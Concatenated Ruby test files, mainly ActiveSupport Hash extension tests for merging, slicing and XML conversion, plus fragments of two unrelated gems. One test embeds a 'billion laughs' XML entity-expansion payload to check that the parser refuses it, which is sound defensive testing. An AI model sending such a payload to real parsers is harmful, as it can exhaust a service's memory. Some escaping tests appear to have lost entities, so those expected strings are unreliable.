# both sides have a non-hash value.
def test_deep_merge_with_block
hash_1 = { :a => "a", :b => "b", :c => { :c1 => "c1", :c2 => "c2", :c3 => { :d1 => "d1" } } }
hash_2 = { :a => 1, :c => { :c1 => 2, :c3 => { :d2 => "d2" } } }
expected = { :a => [:a, "a", 1], :b => "b", :c => { :c1 => [:c1, "c1", 2], :c2 => "c2", :c3 => { :d1 => "d1", :d2 => "d2" } } }
assert_equal(expected, hash_1.deep_merge(hash_2) { |k,o,n| [k, o, n] })
hash_1.deep_merge!(hash_2) { |k,o,n| [k, o, n] }
assert_equal expected, hash_1
end
# deep_merge on an indifferent hash must accept both indifferent and
# plain-hash arguments and produce string keys throughout.
def test_deep_merge_on_indifferent_access
hash_1 = HashWithIndifferentAccess.new({ :a => "a", :b => "b", :c => { :c1 => "c1", :c2 => "c2", :c3 => { :d1 => "d1" } } })
hash_2 = HashWithIndifferentAccess.new({ :a => 1, :c => { :c1 => 2, :c3 => { :d2 => "d2" } } })
hash_3 = { :a => 1, :c => { :c1 => 2, :c3 => { :d2 => "d2" } } }
expected = { "a" => 1, "b" => "b", "c" => { "c1" => 2, "c2" => "c2", "c3" => { "d1" => "d1", "d2" => "d2" } } }
assert_equal expected, hash_1.deep_merge(hash_2)
assert_equal expected, hash_1.deep_merge(hash_3)
hash_1.deep_merge!(hash_2)
assert_equal expected, hash_1
end
# store and []= must write to the same (string) slot regardless of the
# key form, so later writes overwrite earlier ones.
def test_store_on_indifferent_access
hash = HashWithIndifferentAccess.new
hash.store(:test1, 1)
hash.store('test1', 11)
hash[:test2] = 2
hash['test2'] = 22
expected = { "test1" => 11, "test2" => 22 }
assert_equal expected, hash
end
# The Hash[] constructor form must also produce an indifferent hash.
def test_constructor_on_indifferent_access
hash = HashWithIndifferentAccess[:foo, 1]
assert_equal 1, hash[:foo]
assert_equal 1, hash['foo']
hash[:foo] = 3
assert_equal 3, hash[:foo]
assert_equal 3, hash['foo']
end
# reverse_merge treats the receiver's entries as winners over the
# defaults; frozen defaults prove the argument is never mutated.
def test_reverse_merge
defaults = { :a => "x", :b => "y", :c => 10 }.freeze
options = { :a => 1, :b => 2 }
expected = { :a => 1, :b => 2, :c => 10 }
# Should merge defaults into options, creating a new hash.
assert_equal expected, options.reverse_merge(defaults)
assert_not_equal expected, options
# Should merge! defaults into options, replacing options.
merged = options.dup
assert_equal expected, merged.reverse_merge!(defaults)
assert_equal expected, merged
# Should be an alias for reverse_merge!
merged = options.dup
assert_equal expected, merged.reverse_update(defaults)
assert_equal expected, merged
end
# slice returns a new hash restricted to the given keys; slice! keeps
# the given keys in place and returns the removed remainder.
def test_slice
original = { :a => 'x', :b => 'y', :c => 10 }
expected = { :a => 'x', :b => 'y' }
# Should return a new hash with only the given keys.
assert_equal expected, original.slice(:a, :b)
assert_not_equal expected, original
end
def test_slice_inplace
original = { :a => 'x', :b => 'y', :c => 10 }
expected = { :c => 10 }
# Should replace the hash with only the given keys.
assert_equal expected, original.slice!(:a, :b)
end
# An Array used as a key is a single key, not a splat of keys.
def test_slice_with_an_array_key
original = { :a => 'x', :b => 'y', :c => 10, [:a, :b] => "an array key" }
expected = { [:a, :b] => "an array key", :c => 10 }
# Should return a new hash with only the given keys when given an array key.
assert_equal expected, original.slice([:a, :b], :c)
assert_not_equal expected, original
end
def test_slice_inplace_with_an_array_key
original = { :a => 'x', :b => 'y', :c => 10, [:a, :b] => "an array key" }
expected = { :a => 'x', :b => 'y' }
# Should replace the hash with only the given keys when given an array key.
assert_equal expected, original.slice!([:a, :b], :c)
end
def test_slice_with_splatted_keys
original = { :a => 'x', :b => 'y', :c => 10, [:a, :b] => "an array key" }
expected = { :a => 'x', :b => "y" }
# Should grab each of the splatted keys.
assert_equal expected, original.slice(*[:a, :b])
end
# slice / slice! on an indifferent hash must accept string or symbol
# keys interchangeably and return indifferent results.
def test_indifferent_slice
original = { :a => 'x', :b => 'y', :c => 10 }.with_indifferent_access
expected = { :a => 'x', :b => 'y' }.with_indifferent_access
[['a', 'b'], [:a, :b]].each do |keys|
# Should return a new hash with only the given keys.
assert_equal expected, original.slice(*keys), keys.inspect
assert_not_equal expected, original
end
end
def test_indifferent_slice_inplace
original = { :a => 'x', :b => 'y', :c => 10 }.with_indifferent_access
expected = { :c => 10 }.with_indifferent_access
[['a', 'b'], [:a, :b]].each do |keys|
# Should replace the hash with only the given keys.
copy = original.dup
assert_equal expected, copy.slice!(*keys)
end
end
# The sliced result itself must remain indifferent.
def test_indifferent_slice_access_with_symbols
original = {'login' => 'bender', 'password' => 'shiny', 'stuff' => 'foo'}
original = original.with_indifferent_access
slice = original.slice(:login, :password)
assert_equal 'bender', slice[:login]
assert_equal 'bender', slice['login']
end
# extract! removes and returns the named keys (missing keys are simply
# absent from the result), leaving the remainder in place.
def test_extract
original = {:a => 1, :b => 2, :c => 3, :d => 4}
expected = {:a => 1, :b => 2}
remaining = {:c => 3, :d => 4}
assert_equal expected, original.extract!(:a, :b, :x)
assert_equal remaining, original
end
# extract! must distinguish a key stored with a nil value (extracted)
# from a key that was never present (not extracted).
def test_extract_nils
original = {:a => nil, :b => nil}
expected = {:a => nil}
extracted = original.extract!(:a, :x)
assert_equal expected, extracted
# assert_nil replaces the deprecated `assert_equal nil, ...` form.
assert_nil extracted[:a]
assert_nil extracted[:x]
end
# extract! on an indifferent hash must match keys in either form and
# return indifferent extracted/remaining hashes.
def test_indifferent_extract
original = {:a => 1, 'b' => 2, :c => 3, 'd' => 4}.with_indifferent_access
expected = {:a => 1, :b => 2}.with_indifferent_access
remaining = {:c => 3, :d => 4}.with_indifferent_access
[['a', 'b'], [:a, :b]].each do |keys|
copy = original.dup
assert_equal expected, copy.extract!(*keys)
assert_equal remaining, copy
end
end
# except returns a copy without the given keys; except! removes them in
# place. Must work on frozen receivers (except) and must not call
# delete on the original (verified with a mocha expectation).
def test_except
original = { :a => 'x', :b => 'y', :c => 10 }
expected = { :a => 'x', :b => 'y' }
# Should return a new hash without the given keys.
assert_equal expected, original.except(:c)
assert_not_equal expected, original
# Should replace the hash without the given keys.
assert_equal expected, original.except!(:c)
assert_equal expected, original
end
def test_except_with_more_than_one_argument
original = { :a => 'x', :b => 'y', :c => 10 }
expected = { :a => 'x' }
assert_equal expected, original.except(:b, :c)
end
def test_except_with_original_frozen
original = { :a => 'x', :b => 'y' }
original.freeze
assert_nothing_raised { original.except(:a) }
end
def test_except_with_mocha_expectation_on_original
original = { :a => 'x', :b => 'y' }
original.expects(:delete).never
original.except(:a)
end
end
# Fixture used by the to_xml tests: an object whose custom to_xml must
# be honored instead of the generic hash serialization.
class IWriteMyOwnXML
def to_xml(options = {})
# NOTE: intentionally mutates the caller's options hash (||= writes
# :indent and :builder back), mirroring ActiveSupport's own to_xml.
options[:indent] ||= 2
xml = options[:builder] ||= Builder::XmlMarkup.new(:indent => options[:indent])
xml.instruct! unless options[:skip_instruct]
xml.level_one do
xml.tag!(:second_level, 'content')
end
end
end
# Tests for Hash#to_param: query-string serialization with per-object
# to_param hooks, CGI escaping, and deterministic key ordering.
class HashExtToParamTests < ActiveSupport::TestCase
# String subclass whose to_param appends "-1", to prove to_param is
# called on both keys and values.
class ToParam < String
def to_param
"#{self}-1"
end
end
def test_string_hash
assert_equal '', {}.to_param
assert_equal 'hello=world', { :hello => "world" }.to_param
assert_equal 'hello=10', { "hello" => 10 }.to_param
assert_equal 'hello=world&say_bye=true', {:hello => "world", "say_bye" => true}.to_param
end
def test_number_hash
assert_equal '10=20&30=40&50=60', {10 => 20, 30 => 40, 50 => 60}.to_param
end
def test_to_param_hash
assert_equal 'custom-1=param-1&custom2-1=param2-1', {ToParam.new('custom') => ToParam.new('param'), ToParam.new('custom2') => ToParam.new('param2')}.to_param
end
def test_to_param_hash_escapes_its_keys_and_values
assert_equal 'param+1=A+string+with+%2F+characters+%26+that+should+be+%3F+escaped', { 'param 1' => 'A string with / characters & that should be ? escaped' }.to_param
end
# Output must be sorted by key so query strings are stable.
def test_to_param_orders_by_key_in_ascending_order
assert_equal 'a=2&b=1&c=0', Hash[*%w(b 1 c 0 a 2)].to_param
end
end
class HashToXmlTest < ActiveSupport::TestCase
# Common to_xml options: <person> root, no XML declaration, no indent.
def setup
@xml_options = { :root => :person, :skip_instruct => true, :indent => 0 }
end
def test_one_level
xml = { :name => "David", :street => "Paulina" }.to_xml(@xml_options)
assert_equal "<person>", xml.first(8)
assert xml.include?(%(<street>Paulina</street>))
assert xml.include?(%(<name>David</name>))
end
# :dasherize controls whether underscores in keys become dashes.
def test_one_level_dasherize_false
xml = { :name => "David", :street_name => "Paulina" }.to_xml(@xml_options.merge(:dasherize => false))
assert_equal "<person>", xml.first(8)
assert xml.include?(%(<street_name>Paulina</street_name>))
assert xml.include?(%(<name>David</name>))
end
def test_one_level_dasherize_true
xml = { :name => "David", :street_name => "Paulina" }.to_xml(@xml_options.merge(:dasherize => true))
assert_equal "<person>", xml.first(8)
assert xml.include?(%(<street-name>Paulina</street-name>))
assert xml.include?(%(<name>David</name>))
end
# :camelize => true gives UpperCamelCase tags; :lower gives lowerCamel.
def test_one_level_camelize_true
xml = { :name => "David", :street_name => "Paulina" }.to_xml(@xml_options.merge(:camelize => true))
assert_equal "<Person>", xml.first(8)
assert xml.include?(%(<StreetName>Paulina</StreetName>))
assert xml.include?(%(<Name>David</Name>))
end
def test_one_level_camelize_lower
xml = { :name => "David", :street_name => "Paulina" }.to_xml(@xml_options.merge(:camelize => :lower))
assert_equal "<person>", xml.first(8)
assert xml.include?(%(<streetName>Paulina</streetName>))
assert xml.include?(%(<name>David</name>))
end
# Non-string values must carry a type attribute (integer, date, symbol
# etc.) unless :skip_types is set; nil values render nil="true".
def test_one_level_with_types
xml = { :name => "David", :street => "Paulina", :age => 26, :age_in_millis => 820497600000, :moved_on => Date.new(2005, 11, 15), :resident => :yes }.to_xml(@xml_options)
assert_equal "<person>", xml.first(8)
assert xml.include?(%(<street>Paulina</street>))
assert xml.include?(%(<name>David</name>))
assert xml.include?(%(<age type="integer">26</age>))
assert xml.include?(%(<age-in-millis type="integer">820497600000</age-in-millis>))
assert xml.include?(%(<moved-on type="date">2005-11-15</moved-on>))
assert xml.include?(%(<resident type="symbol">yes</resident>))
end
def test_one_level_with_nils
xml = { :name => "David", :street => "Paulina", :age => nil }.to_xml(@xml_options)
assert_equal "<person>", xml.first(8)
assert xml.include?(%(<street>Paulina</street>))
assert xml.include?(%(<name>David</name>))
assert xml.include?(%(<age nil="true"/>))
end
def test_one_level_with_skipping_types
xml = { :name => "David", :street => "Paulina", :age => nil }.to_xml(@xml_options.merge(:skip_types => true))
assert_equal "<person>", xml.first(8)
assert xml.include?(%(<street>Paulina</street>))
assert xml.include?(%(<name>David</name>))
assert xml.include?(%(<age nil="true"/>))
end
# A block given to to_xml receives the builder for extra tags.
def test_one_level_with_yielding
xml = { :name => "David", :street => "Paulina" }.to_xml(@xml_options) do |x|
x.creator("Rails")
end
assert_equal "<person>", xml.first(8)
assert xml.include?(%(<street>Paulina</street>))
assert xml.include?(%(<name>David</name>))
assert xml.include?(%(<creator>Rails</creator>))
end
# Nested hashes become nested elements; nested arrays become
# type="array" containers with singularized child tags; objects with
# their own to_xml serialize themselves.
def test_two_levels
xml = { :name => "David", :address => { :street => "Paulina" } }.to_xml(@xml_options)
assert_equal "<person>", xml.first(8)
assert xml.include?(%(<address><street>Paulina</street></address>))
assert xml.include?(%(<name>David</name>))
end
def test_two_levels_with_second_level_overriding_to_xml
xml = { :name => "David", :address => { :street => "Paulina" }, :child => IWriteMyOwnXML.new }.to_xml(@xml_options)
assert_equal "<person>", xml.first(8)
assert xml.include?(%(<address><street>Paulina</street></address>))
assert xml.include?(%(<level_one><second_level>content</second_level></level_one>))
end
def test_two_levels_with_array
xml = { :name => "David", :addresses => [{ :street => "Paulina" }, { :street => "Evergreen" }] }.to_xml(@xml_options)
assert_equal "<person>", xml.first(8)
assert xml.include?(%(<addresses type="array"><address>))
assert xml.include?(%(<address><street>Paulina</street></address>))
assert xml.include?(%(<address><street>Evergreen</street></address>))
assert xml.include?(%(<name>David</name>))
end
def test_three_levels_with_array
xml = { :name => "David", :addresses => [{ :streets => [ { :name => "Paulina" }, { :name => "Paulina" } ] } ] }.to_xml(@xml_options)
assert xml.include?(%(<addresses type="array"><address><streets type="array"><street><name>))
end
# Times serialize as ISO-8601 dateTime, preserving the zone offset.
def test_timezoned_attributes
xml = {
:created_at => Time.utc(1999,2,2),
:local_created_at => Time.utc(1999,2,2).in_time_zone('Eastern Time (US & Canada)')
}.to_xml(@xml_options)
assert_match %r{<created-at type=\"dateTime\">1999-02-02T00:00:00Z</created-at>}, xml
assert_match %r{<local-created-at type=\"dateTime\">1999-02-01T19:00:00-05:00</local-created-at>}, xml
end
# from_xml must ignore unknown attributes on the array container
# (page, page-count, per-page) while still typecasting child values.
def test_multiple_records_from_xml_with_attributes_other_than_type_ignores_them_without_exploding
topics_xml = <<-EOT
<topics type="array" page="1" page-count="1000" per-page="2">
<topic>
<title>The First Topic</title>
<author-name>David</author-name>
<id type="integer">1</id>
<approved type="boolean">false</approved>
<replies-count type="integer">0</replies-count>
<replies-close-in type="integer">2592000000</replies-close-in>
<written-on type="date">2003-07-16</written-on>
<viewed-at type="datetime">2003-07-16T09:28:00+0000</viewed-at>
<content>Have a nice day</content>
<author-email-address>[email protected]</author-email-address>
<parent-id nil="true"></parent-id>
</topic>
<topic>
<title>The Second Topic</title>
<author-name>Jason</author-name>
<id type="integer">1</id>
<approved type="boolean">false</approved>
<replies-count type="integer">0</replies-count>
<replies-close-in type="integer">2592000000</replies-close-in>
<written-on type="date">2003-07-16</written-on>
<viewed-at type="datetime">2003-07-16T09:28:00+0000</viewed-at>
<content>Have a nice day</content>
<author-email-address>[email protected]</author-email-address>
<parent-id></parent-id>
</topic>
</topics>
EOT
expected_topic_hash = {
:title => "The First Topic",
:author_name => "David",
:id => 1,
:approved => false,
:replies_count => 0,
:replies_close_in => 2592000000,
:written_on => Date.new(2003, 7, 16),
:viewed_at => Time.utc(2003, 7, 16, 9, 28),
:content => "Have a nice day",
:author_email_address => "[email protected]",
:parent_id => nil
}.stringify_keys
assert_equal expected_topic_hash, Hash.from_xml(topics_xml)["topics"].first
end
# from_xml must typecast integer/boolean/date/datetime/decimal/float
# values (including whitespace-padded booleans) and dasherized tags
# must become underscored keys.
def test_single_record_from_xml
topic_xml = <<-EOT
<topic>
<title>The First Topic</title>
<author-name>David</author-name>
<id type="integer">1</id>
<approved type="boolean"> true </approved>
<replies-count type="integer">0</replies-count>
<replies-close-in type="integer">2592000000</replies-close-in>
<written-on type="date">2003-07-16</written-on>
<viewed-at type="datetime">2003-07-16T09:28:00+0000</viewed-at>
<author-email-address>[email protected]</author-email-address>
<parent-id></parent-id>
<ad-revenue type="decimal">1.5</ad-revenue>
<optimum-viewing-angle type="float">135</optimum-viewing-angle>
</topic>
EOT
expected_topic_hash = {
:title => "The First Topic",
:author_name => "David",
:id => 1,
:approved => true,
:replies_count => 0,
:replies_close_in => 2592000000,
:written_on => Date.new(2003, 7, 16),
:viewed_at => Time.utc(2003, 7, 16, 9, 28),
:author_email_address => "[email protected]",
:parent_id => nil,
:ad_revenue => BigDecimal("1.50"),
:optimum_viewing_angle => 135.0,
}.stringify_keys
assert_equal expected_topic_hash, Hash.from_xml(topic_xml)["topic"]
end
# Empty typed elements must all parse to nil, whatever the type.
def test_single_record_from_xml_with_nil_values
topic_xml = <<-EOT
<topic>
<title></title>
<id type="integer"></id>
<approved type="boolean"></approved>
<written-on type="date"></written-on>
<viewed-at type="datetime"></viewed-at>
<parent-id></parent-id>
</topic>
EOT
expected_topic_hash = {
:title => nil,
:id => nil,
:approved => nil,
:written_on => nil,
:viewed_at => nil,
:parent_id => nil
}.stringify_keys
assert_equal expected_topic_hash, Hash.from_xml(topic_xml)["topic"]
end
# A type="array" container must parse to a Ruby Array of typecast
# child hashes.
def test_multiple_records_from_xml
topics_xml = <<-EOT
<topics type="array">
<topic>
<title>The First Topic</title>
<author-name>David</author-name>
<id type="integer">1</id>
<approved type="boolean">false</approved>
<replies-count type="integer">0</replies-count>
<replies-close-in type="integer">2592000000</replies-close-in>
<written-on type="date">2003-07-16</written-on>
<viewed-at type="datetime">2003-07-16T09:28:00+0000</viewed-at>
<content>Have a nice day</content>
<author-email-address>[email protected]</author-email-address>
<parent-id nil="true"></parent-id>
</topic>
<topic>
<title>The Second Topic</title>
<author-name>Jason</author-name>
<id type="integer">1</id>
<approved type="boolean">false</approved>
<replies-count type="integer">0</replies-count>
<replies-close-in type="integer">2592000000</replies-close-in>
<written-on type="date">2003-07-16</written-on>
<viewed-at type="datetime">2003-07-16T09:28:00+0000</viewed-at>
<content>Have a nice day</content>
<author-email-address>[email protected]</author-email-address>
<parent-id></parent-id>
</topic>
</topics>
EOT
expected_topic_hash = {
:title => "The First Topic",
:author_name => "David",
:id => 1,
:approved => false,
:replies_count => 0,
:replies_close_in => 2592000000,
:written_on => Date.new(2003, 7, 16),
:viewed_at => Time.utc(2003, 7, 16, 9, 28),
:content => "Have a nice day",
:author_email_address => "[email protected]",
:parent_id => nil
}.stringify_keys
assert_equal expected_topic_hash, Hash.from_xml(topics_xml)["topics"].first
end
# XML attributes (other than "type") on a leaf element become string
# entries of the resulting hash.
def test_single_record_from_xml_with_attributes_other_than_type
topic_xml = <<-EOT
<rsp stat="ok">
<photos page="1" pages="1" perpage="100" total="16">
<photo id="175756086" owner="55569174@N00" secret="0279bf37a1" server="76" title="Colored Pencil PhotoBooth Fun" ispublic="1" isfriend="0" isfamily="0"/>
</photos>
</rsp>
EOT
expected_topic_hash = {
:id => "175756086",
:owner => "55569174@N00",
:secret => "0279bf37a1",
:server => "76",
:title => "Colored Pencil PhotoBooth Fun",
:ispublic => "1",
:isfriend => "0",
:isfamily => "0",
}.stringify_keys
assert_equal expected_topic_hash, Hash.from_xml(topic_xml)["rsp"]["photos"]["photo"]
end
# All-caps tag names must be preserved verbatim (no underscoring).
def test_all_caps_key_from_xml
test_xml = <<-EOT
<ABC3XYZ>
<TEST>Lorem Ipsum</TEST>
</ABC3XYZ>
EOT
expected_hash = {
"ABC3XYZ" => {
"TEST" => "Lorem Ipsum"
}
}
assert_equal expected_hash, Hash.from_xml(test_xml)
end
# type="array" containers: empty (with or without whitespace) parse to
# [], one child to a one-element array, several children to an array
# of values.
def test_empty_array_from_xml
blog_xml = <<-XML
<blog>
<posts type="array"></posts>
</blog>
XML
expected_blog_hash = {"blog" => {"posts" => []}}
assert_equal expected_blog_hash, Hash.from_xml(blog_xml)
end
def test_empty_array_with_whitespace_from_xml
blog_xml = <<-XML
<blog>
<posts type="array">
</posts>
</blog>
XML
expected_blog_hash = {"blog" => {"posts" => []}}
assert_equal expected_blog_hash, Hash.from_xml(blog_xml)
end
def test_array_with_one_entry_from_xml
blog_xml = <<-XML
<blog>
<posts type="array">
<post>a post</post>
</posts>
</blog>
XML
expected_blog_hash = {"blog" => {"posts" => ["a post"]}}
assert_equal expected_blog_hash, Hash.from_xml(blog_xml)
end
def test_array_with_multiple_entries_from_xml
blog_xml = <<-XML
<blog>
<posts type="array">
<post>a post</post>
<post>another post</post>
</posts>
</blog>
XML
expected_blog_hash = {"blog" => {"posts" => ["a post", "another post"]}}
assert_equal expected_blog_hash, Hash.from_xml(blog_xml)
end
# type="file" elements parse into a StringIO-like object carrying
# original_filename and content_type, with sensible defaults when the
# attributes are missing.
def test_file_from_xml
blog_xml = <<-XML
<blog>
<logo type="file" name="logo.png" content_type="image/png">
</logo>
</blog>
XML
hash = Hash.from_xml(blog_xml)
assert hash.has_key?('blog')
assert hash['blog'].has_key?('logo')
file = hash['blog']['logo']
assert_equal 'logo.png', file.original_filename
assert_equal 'image/png', file.content_type
end
def test_file_from_xml_with_defaults
blog_xml = <<-XML
<blog>
<logo type="file">
</logo>
</blog>
XML
file = Hash.from_xml(blog_xml)['blog']['logo']
assert_equal 'untitled', file.original_filename
assert_equal 'application/octet-stream', file.content_type
end
# Whitespace-only content must not hide a tag's attributes.
def test_tag_with_attrs_and_whitespace
xml = <<-XML
<blog name="bacon is the best">
</blog>
XML
hash = Hash.from_xml(xml)
assert_equal "bacon is the best", hash['blog']['name']
end
# An empty CDATA section parses to the empty string, not nil.
def test_empty_cdata_from_xml
xml = "<data><![CDATA[]]></data>"
assert_equal "", Hash.from_xml(xml)["data"]
end
# XSD-style type names (double, decimal, boolean, dateTime,
# base64Binary, binary+encoding) must all be typecast correctly.
def test_xsd_like_types_from_xml
bacon_xml = <<-EOT
<bacon>
<weight type="double">0.5</weight>
<price type="decimal">12.50</price>
<chunky type="boolean"> 1 </chunky>
<expires-at type="dateTime">2007-12-25T12:34:56+0000</expires-at>
<notes type="string"></notes>
<illustration type="base64Binary">YmFiZS5wbmc=</illustration>
<caption type="binary" encoding="base64">VGhhdCdsbCBkbywgcGlnLg==</caption>
</bacon>
EOT
expected_bacon_hash = {
:weight => 0.5,
:chunky => true,
:price => BigDecimal("12.50"),
:expires_at => Time.utc(2007,12,25,12,34,56),
:notes => "",
:illustration => "babe.png",
:caption => "That'll do, pig."
}.stringify_keys
assert_equal expected_bacon_hash, Hash.from_xml(bacon_xml)["bacon"]
end
# An unrecognized type attribute is kept as a plain "type" entry
# rather than triggering a cast.
def test_type_trickles_through_when_unknown
product_xml = <<-EOT
<product>
<weight type="double">0.5</weight>
<image type="ProductImage"><filename>image.gif</filename></image>
</product>
EOT
expected_product_hash = {
:weight => 0.5,
:image => {'type' => 'ProductImage', 'filename' => 'image.gif' },
}.stringify_keys
assert_equal expected_product_hash, Hash.from_xml(product_xml)["product"]
end
# Security: caller-supplied disallowed types, and the symbol/yaml
# defaults, must raise; from_trusted_xml opts back in.
def test_from_xml_raises_on_disallowed_type_attributes
assert_raise ActiveSupport::XMLConverter::DisallowedType do
Hash.from_xml '<product><name type="foo">value</name></product>', %w(foo)
end
end
def test_from_xml_disallows_symbol_and_yaml_types_by_default
assert_raise ActiveSupport::XMLConverter::DisallowedType do
Hash.from_xml '<product><name type="symbol">value</name></product>'
end
assert_raise ActiveSupport::XMLConverter::DisallowedType do
Hash.from_xml '<product><name type="yaml">value</name></product>'
end
end
def test_from_trusted_xml_allows_symbol_and_yaml_types
expected = { 'product' => { 'name' => :value }}
assert_equal expected, Hash.from_trusted_xml('<product><name type="symbol">value</name></product>')
assert_equal expected, Hash.from_trusted_xml('<product><name type="yaml">:value</name></product>')
end
# HashWithIndifferentAccess default-value semantics: the constructor
# default is served for unknown keys, readable via #default, nil when
# unset, and carried over by with_indifferent_access.
def test_should_use_default_value_for_unknown_key
hash_wia = HashWithIndifferentAccess.new(3)
assert_equal 3, hash_wia[:new_key]
end
def test_should_use_default_value_if_no_key_is_supplied
hash_wia = HashWithIndifferentAccess.new(3)
assert_equal 3, hash_wia.default
end
def test_should_nil_if_no_default_value_is_supplied
hash_wia = HashWithIndifferentAccess.new
assert_nil hash_wia.default
end
# with_indifferent_access on an already-indifferent hash returns an
# equal but distinct copy.
def test_should_return_dup_for_with_indifferent_access
hash_wia = HashWithIndifferentAccess.new
assert_equal hash_wia, hash_wia.with_indifferent_access
assert_not_same hash_wia, hash_wia.with_indifferent_access
end
def test_should_copy_the_default_value_when_converting_to_hash_with_indifferent_access
hash = Hash.new(3)
hash_wia = hash.with_indifferent_access
assert_equal 3, hash_wia.default
end
# The XML builder seems to fail miserably when trying to tag something
# with the same name as a Kernel method (throw, test, loop, select ...)
def test_kernel_method_names_to_xml
hash = { :throw => { :ball => 'red' } }
expected = '<person><throw><ball>red</ball></throw></person>'
assert_nothing_raised do
assert_equal expected, hash.to_xml(@xml_options)
end
end
# Parsing an empty document must not raise.
def test_empty_string_works_for_typecast_xml_value
assert_nothing_raised do
ActiveSupport::XMLConverter.new("").to_h
end
end
# to_xml must escape "&" in values; from_xml must unescape entities —
# the round trip below proves the pair is lossless.
def test_escaping_to_xml
hash = {
:bare_string => 'First & Last Name',
:pre_escaped_string => 'First & Last Name'
}.stringify_keys
expected_xml = '<person><bare-string>First & Last Name</bare-string><pre-escaped-string>First &amp; Last Name</pre-escaped-string></person>'
assert_equal expected_xml, hash.to_xml(@xml_options)
end
def test_unescaping_from_xml
xml_string = '<person><bare-string>First & Last Name</bare-string><pre-escaped-string>First &amp; Last Name</pre-escaped-string></person>'
expected_hash = {
:bare_string => 'First & Last Name',
:pre_escaped_string => 'First & Last Name'
}.stringify_keys
assert_equal expected_hash, Hash.from_xml(xml_string)['person']
end
def test_roundtrip_to_xml_from_xml
hash = {
:bare_string => 'First & Last Name',
:pre_escaped_string => 'First & Last Name'
}.stringify_keys
assert_equal hash, Hash.from_xml(hash.to_xml(@xml_options))['person']
end
# datetime values parse to UTC Time instances regardless of the
# offset in the document, including dates beyond 2038 (no 32-bit
# time_t truncation).
def test_datetime_xml_type_with_utc_time
alert_xml = <<-XML
<alert>
<alert_at type="datetime">2008-02-10T15:30:45Z</alert_at>
</alert>
XML
alert_at = Hash.from_xml(alert_xml)['alert']['alert_at']
assert alert_at.utc?
assert_equal Time.utc(2008, 2, 10, 15, 30, 45), alert_at
end
def test_datetime_xml_type_with_non_utc_time
alert_xml = <<-XML
<alert>
<alert_at type="datetime">2008-02-10T10:30:45-05:00</alert_at>
</alert>
XML
alert_at = Hash.from_xml(alert_xml)['alert']['alert_at']
assert alert_at.utc?
assert_equal Time.utc(2008, 2, 10, 15, 30, 45), alert_at
end
def test_datetime_xml_type_with_far_future_date
alert_xml = <<-XML
<alert>
<alert_at type="datetime">2050-02-10T15:30:45Z</alert_at>
</alert>
XML
alert_at = Hash.from_xml(alert_xml)['alert']['alert_at']
assert alert_at.utc?
assert_equal 2050, alert_at.year
assert_equal 2, alert_at.month
assert_equal 10, alert_at.day
assert_equal 15, alert_at.hour
assert_equal 30, alert_at.min
assert_equal 45, alert_at.sec
end
# to_xml must work on a duplicate of its options hash, leaving the
# caller's hash untouched.
def test_to_xml_dups_options
options = {:skip_instruct => true}
{}.to_xml(options)
# :builder, etc, shouldn't be added to options
assert_equal({:skip_instruct => true}, options)
end
def test_expansion_count_is_limited
expected =
case ActiveSupport::XmlMini.backend.name
when 'ActiveSupport::XmlMini_REXML'; RuntimeError
when 'ActiveSupport::XmlMini_Nokogiri'; Nokogiri::XML::SyntaxError
when 'ActiveSupport::XmlMini_NokogiriSAX'; RuntimeError
when 'ActiveSupport::XmlMini_LibXML'; LibXML::XML::Error
when 'ActiveSupport::XmlMini_LibXMLSAX'; LibXML::XML::Error
end
assert_raise expected do
attack_xml = <<-EOT
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE member [
<!ENTITY a "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
<!ENTITY b "&c;&c;&c;&c;&c;&c;&c;&c;&c;&c;">
<!ENTITY c "&d;&d;&d;&d;&d;&d;&d;&d;&d;&d;">
<!ENTITY d "&e;&e;&e;&e;&e;&e;&e;&e;&e;&e;">
<!ENTITY e "&f;&f;&f;&f;&f;&f;&f;&f;&f;&f;">
<!ENTITY f "&g;&g;&g;&g;&g;&g;&g;&g;&g;&g;">
<!ENTITY g "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
]>
<member>
&a;
</member>
EOT
Hash.from_xml(attack_xml)
end
end
end
| 35.542781 | 173 | 0.675807 |
module Waistband
  # Namespace for the gem's domain-specific error classes. All of them are
  # plain StandardError subclasses so callers can rescue them individually
  # or as StandardError.
  module Errors
    # Raised when creating an index that is already present.
    class IndexExists < StandardError
    end

    # Raised when an operation references an index that does not exist.
    class IndexNotFound < StandardError
    end

    # Raised when a search unexpectedly returns no hits.
    class NoSearchHits < StandardError
    end
  end
end
| 17.7 | 44 | 0.745763 |
# Shared assertion helpers for the PagarMe API test suite. Each helper checks
# a server response object (transaction, subscription, balance, ...) against
# the fixture data the tests create.
module Assertions
  # Customer payload matches the canonical test customer.
  # NOTE: the email literal below appears redacted ("[email protected]") — verify against
  # the fixture it is compared to.
  def assert_customer_response(customer)
    assert customer.id
    assert_equal customer.name, 'Jose da Silva'
    assert_equal customer.document_number, '84931126235'
    assert_equal customer.email, '[email protected]'
    assert_equal customer.gender, 'M'
    assert_equal Date.parse(customer.born_at), Date.parse('1970-10-11')
  end
  # Subscription is paid via credit card with the expected amount.
  # NOTE(review): the +installments+ parameter is accepted but never used in
  # the body — confirm whether an installments assertion is missing.
  def assert_subscription_successfully_paid(subscription, amount = 2000, installments = 1)
    assert subscription.id
    assert !subscription.plan
    assert subscription.current_transaction.kind_of?(PagarMe::Transaction)
    assert subscription.current_transaction.id
    assert subscription.current_transaction.date_created
    assert !subscription.current_transaction.refuse_reason
    assert !subscription.current_transaction.boleto_url
    assert !subscription.current_transaction.boleto_barcode
    assert_equal subscription.status, 'paid'
    assert_equal subscription.current_transaction.amount, amount
    assert_equal subscription.current_transaction.payment_method, 'credit_card'
    assert_equal subscription.current_transaction.status, 'paid'
    assert_equal subscription.current_transaction.card_brand, 'visa'
  end
  # Common credit-card transaction checks (shared by paid/processing variants).
  def assert_transaction_successfully(transaction)
    assert transaction.id
    assert transaction.date_created
    assert transaction.card.id
    assert !transaction.refuse_reason
    assert_equal transaction.amount, 1000
    assert_equal transaction.installments.to_i, 1
    assert_equal transaction.card_holder_name, 'Jose da Silva'
    assert_equal transaction.payment_method, 'credit_card'
    assert_equal transaction.card_brand, 'visa'
    assert_equal transaction.card.first_digits, '490172'
    assert_equal transaction.card.last_digits, '4448'
  end
  # Paid variant: no postback URL and status 'paid'.
  def assert_transaction_successfully_paid(transaction)
    assert !transaction.postback_url
    assert_equal transaction.status, 'paid'
    assert_transaction_successfully transaction
  end
  # Processing variant: transaction carries a postback URL and is async.
